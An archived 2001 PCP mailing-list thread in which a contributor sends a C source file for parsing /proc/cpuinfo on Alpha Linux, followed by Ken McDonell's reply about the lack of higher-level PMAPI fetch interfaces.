[mailto:markgw@sgi.com] Sent: Tuesday, June 19, 2001 3:30 AM To: gilly Subject: RE: porting PCP to Red Hat Alpha linux On Mon, 18 Jun 2001, gilly wrote: > There's a problem creating a matching patch to do exactly what the code is > doing now. > In the alpha format of /proc/cpuinfo there are no details per processor as > in the intel one (since all processors have the same capabilities), > therefore I can fill only ONE 'info' struct and get the number of active & > detected processors. ok, send me whatever you've got then. I'll work from that .. -- Mark ------=_NextPart_000_0001_01C0FA44.2C2C3A30 Content-Type: application/octet-stream; name="proc_cpuinfo.c.patch" Content-Transfer-Encoding: quoted-printable Content-Disposition: attachment; filename="proc_cpuinfo.c.patch" /*=0A= * Linux /proc/cpuinfo metrics cluster=0A= *=0A= * Copyright (c) 2000 Silicon Graphics, Inc. All Rights Reserved.=0A= * =0A= * This program is free software; you can redistribute it and/or modify = it=0A= * under the terms of version 2 of the GNU General Public License as=0A= * published by the Free Software Foundation.=0A= * =0A= * This program is distributed in the hope that it would be useful, but=0A= * WITHOUT ANY WARRANTY; without even the implied warranty of=0A= * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.=0A= * =0A= * Further, this software is distributed without any warranty that it is=0A= * free of the rightful claim of any third person regarding infringement=0A= * or the like. Any license provided herein, whether implied or=0A= * otherwise, applies only to this software file. Patent licenses, if=0A= * any, provided herein do not apply to combinations of this program with=0A= * other software, or any other product whatsoever.=0A= * =0A= * You should have received a copy of the GNU General Public License = along=0A= * with this program; if not, write the Free Software Foundation, Inc., = 59=0A= * Temple Place - Suite 330, Boston MA 02111-1307, USA.=0A= * =0A= * Contact information: Silicon Graphics, Inc., 1600 Amphitheatre Pkwy,=0A= * Mountain View, CA 94043, or:=0A= * =0A= * http://www.sgi.com =0A= * =0A= * For further information regarding this notice, see: =0A= * =0A= * http://oss.sgi.com/projects/GenInfo/SGIGPLNoticeExplan/=0A= */=0A= =0A= #ident "$Id: proc_cpuinfo.c,v 1.5 2001/04/18 23:42:04 markgw Exp $"=0A= =0A= #include =0A= #include =0A= #include =0A= #include =0A= #include =0A= #include =0A= #include =0A= =0A= #include "pmapi.h"=0A= #include "impl.h"=0A= #include "pmda.h"=0A= =0A= #include "proc_cpuinfo.h"=0A= =0A= static int started =3D 0;=0A= =0A= char *=0A= cpu_name(proc_cpuinfo_t *proc_cpuinfo, int c)=0A= {=0A= char name[1024];=0A= char realname[1024];=0A= char *s =3D NULL;=0A= int cpu_on_bus;=0A= int cnode;=0A= int module;=0A= int slot;=0A= =0A= if (!started)=0A= refresh_proc_cpuinfo(proc_cpuinfo);=0A= if (proc_cpuinfo->cpuinfo[c].sapic) {=0A= sscanf(proc_cpuinfo->cpuinfo[c].sapic, "(%d:%x)", &cpu_on_bus, &cnode);=0A= sprintf(name, "/dev/hw/nodenum/%d", cnode);=0A= if (realpath(name, realname) !=3D NULL) {=0A= if (sscanf(realname, "/dev/hw/module/%dc%d", &module, &slot) =3D=3D = 2) {=0A= sprintf(name, "cpu:%d.%d.%c", module, slot, 'a' + cpu_on_bus);=0A= s =3D name;=0A= if (proc_cpuinfo->machine =3D=3D NULL)=0A= proc_cpuinfo->machine =3D strdup("IP35");=0A= }=0A= }=0A= }=0A= =0A= if (s =3D=3D NULL) {=0A= sprintf(name, "cpu%d", c);=0A= s =3D name;=0A= if (proc_cpuinfo->machine =3D=3D NULL)=0A= // proc_cpuinfo->machine =3D strdup("unknown");=0A= /* the help says: "IP35 if SGI SNIA, else simply linux" */=0A= proc_cpuinfo->machine =3D strdup("linux");=0A= }=0A= =0A= return strdup(s);=0A= }=0A= =0A= int=0A= refresh_proc_cpuinfo(proc_cpuinfo_t *proc_cpuinfo)=0A= {=0A= char buf[4096];=0A= FILE *fp;=0A= int cpunum;=0A= cpuinfo_t *info;=0A= char *val;=0A= char *p;=0A= int i;=0A= =0A= if (!started) {=0A= int need;=0A= if (proc_cpuinfo->cpuindom =3D=3D NULL || = proc_cpuinfo->cpuindom->it_numinst =3D=3D 0)=0A= abort();=0A= need =3D proc_cpuinfo->cpuindom->it_numinst * sizeof(cpuinfo_t);=0A= proc_cpuinfo->cpuinfo =3D (cpuinfo_t *)malloc(need);=0A= memset(proc_cpuinfo->cpuinfo, 0, need);=0A= started =3D 1;=0A= }=0A= =0A= if ((fp =3D fopen("/proc/cpuinfo", "r")) =3D=3D (FILE *)NULL)=0A= return -errno;=0A= =0A= #ifdef __alpha__=0A= cpunum =3D 0;=0A= #else //intel=0A= cpunum =3D -1;=0A= #endif=0A= while (fgets(buf, sizeof(buf), fp) !=3D NULL) {=0A= if ((val =3D strrchr(buf, '\n')) !=3D NULL)=0A= *val =3D '\0';=0A= if ((val =3D strchr(buf, ':')) =3D=3D NULL)=0A= continue;=0A= val +=3D 2;=0A= =0A= #ifndef __alpha__=0A= if (strncmp(buf, "processor", 9) =3D=3D 0) {=0A= cpunum++;=0A= proc_cpuinfo->cpuinfo[cpunum].cpu_num =3D atoi(val);=0A= continue;=0A= }=0A= #endif=0A= =0A= info =3D &proc_cpuinfo->cpuinfo[cpunum];=0A= =0A= if (info->sapic =3D=3D NULL && strncasecmp(buf, "sapic", 5) =3D=3D 0)=0A= info->sapic =3D strdup(val);=0A= if (info->model =3D=3D NULL && strncasecmp(buf, "model name", 10) = =3D=3D 0)=0A= info->model =3D strdup(val);=0A= if (info->model =3D=3D NULL && strncasecmp(buf, "model", 5) =3D=3D 0)=0A= info->model =3D strdup(val);=0A= if (info->model =3D=3D NULL && strncasecmp(buf, "cpu model", 9) =3D=3D = 0)=0A= info->model =3D strdup(val);=0A= if (info->vendor =3D=3D NULL && strncasecmp(buf, "vendor", 6) =3D=3D 0)=0A= info->vendor =3D strdup(val);=0A= if (info->stepping =3D=3D NULL && strncasecmp(buf, "step", 4) =3D=3D 0)=0A= info->stepping =3D strdup(val);=0A= if (info->stepping =3D=3D NULL && strncasecmp(buf, "revision", 8) = =3D=3D 0)=0A= info->stepping =3D strdup(val);=0A= if (info->stepping =3D=3D NULL && strncasecmp(buf, "cpu revision", 12) = =3D=3D 0)=0A= info->stepping =3D strdup(val);=0A= if (info->clock =3D=3D 0.0 && strncasecmp(buf, "cpu MHz", 7) =3D=3D 0)=0A= info->clock =3D atof(val);=0A= if (info->clock =3D=3D 0.0 && strncasecmp(buf, "cycle frequency", 15) = =3D=3D 0) {=0A= if ((p =3D strchr(val, ' ')) !=3D NULL)=0A= *p =3D '\0';=0A= info->clock =3D (atof(val))/1000000;=0A= }=0A= if (info->cache =3D=3D 0 && strncasecmp(buf, "cache", 5) =3D=3D 0)=0A= info->cache =3D atoi(val);=0A= if (info->bogomips =3D=3D 0.0 && strncasecmp(buf, "bogo", 4) =3D=3D 0)=0A= info->bogomips =3D atof(val);=0A= if (info->bogomips =3D=3D 0.0 && strncasecmp(buf, "BogoMIPS", 8) =3D=3D = 0)=0A= info->bogomips =3D atof(val);=0A= }=0A= fclose(fp);=0A= #ifdef __alpha__=0A= /* all processors are identical, therefore duplicate it to all the = instances */=0A= for (i=3D1; icpuindom->it_numinst; i++)=0A= memcpy(&proc_cpuinfo->cpuinfo[i], info, sizeof(cpuinfo_t));=0A= #endif=0A= /* success */=0A= return 0;=0A= }=0A= ------=_NextPart_000_0001_01C0FA44.2C2C3A30-- From owner-pcp@oss.sgi.com Thu Jun 28 19:35:47 2001 Received: (from majordomo@localhost) by oss.sgi.com (8.11.2/8.11.3) id f5T2ZlS23764 for pcp-outgoing; Thu, 28 Jun 2001 19:35:47 -0700 Received: from yog-sothoth.sgi.com (eugate.sgi.com [192.48.160.10]) by oss.sgi.com (8.11.2/8.11.3) with SMTP id f5T2ZkV23760 for ; Thu, 28 Jun 2001 19:35:46 -0700 Received: from rattle.melbourne.sgi.com (rattle.melbourne.sgi.com [134.14.55.145]) by yog-sothoth.sgi.com (980305.SGI.8.8.8-aspam-6.2/980304.SGI-aspam-europe) via ESMTP id EAA502343 for ; Fri, 29 Jun 2001 04:35:43 +0200 (CEST) mail_from (kenmcd@melbourne.sgi.com) Received: from localhost (kenmcd@localhost) by rattle.melbourne.sgi.com (SGI-8.9.3/8.9.3) with ESMTP id MAA86451; Fri, 29 Jun 2001 12:34:23 +1000 (AEST) X-Authentication-Warning: rattle.melbourne.sgi.com: kenmcd owned process doing -bs Date: Fri, 29 Jun 2001 12:34:23 +1000 From: Ken McDonell Reply-To: To: gilly cc: Subject: Re: user friendly PMAPI In-Reply-To: <000401c0fa33$6d9c2680$2a04000a@exanet> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-pcp@oss.sgi.com Precedence: bulk On Thu, 21 Jun 2001, gilly wrote: > hello again. > The man page of pmFetch says - "Note that pmFetch is the most primitive > method of fetchingmetric values from the PMCS. More user friendly interfaces > to the PMCS are available or currently under development..." Are there any > 'more friendly interfaces available NOW in the open source package? if so, > can you please tell me where? No there are none that we'd promote to the point of documenting how they work and encouraging people to use them. We've had several (3, 4, may be more) to define an abstraction that has been termed the "performance metrics class" API ... there is an instance of this in: - pmie (uses a homebrew scheme, no external APIs) - the __pmOptFetch family of routines in libpcp and the higher level wrappers around these implemented by the __pmFetchGroup family of routines in libpcp_mon: used by pmlogger, pmchart and opsview - libpcp_omc (uses __pmFetchGroup): used by pmview, pmview+ and the old oview. - libpcp_pmc: used by pmdumptext, pmgadgets, pmjd Some, but definitely not all of these have been open sourced. In each case we've ended up with an API that is easier to code to (even this is open to dispute), at the cost of some reduced functionality. The trade-offs were ones that we could not all agree to, and we seemed to be no closer to converging on a better solution at each iteration. So the whole issue has been pushed into the "too hard" basket ... the pmFetch man page is a historical hangover. If anyone wants to pick this issue up and run with it, please go ahead ... I can think of several champions for the existing abortive attempts who'd be happy to review suggestions and highlight the conceptual and semantic difficulties.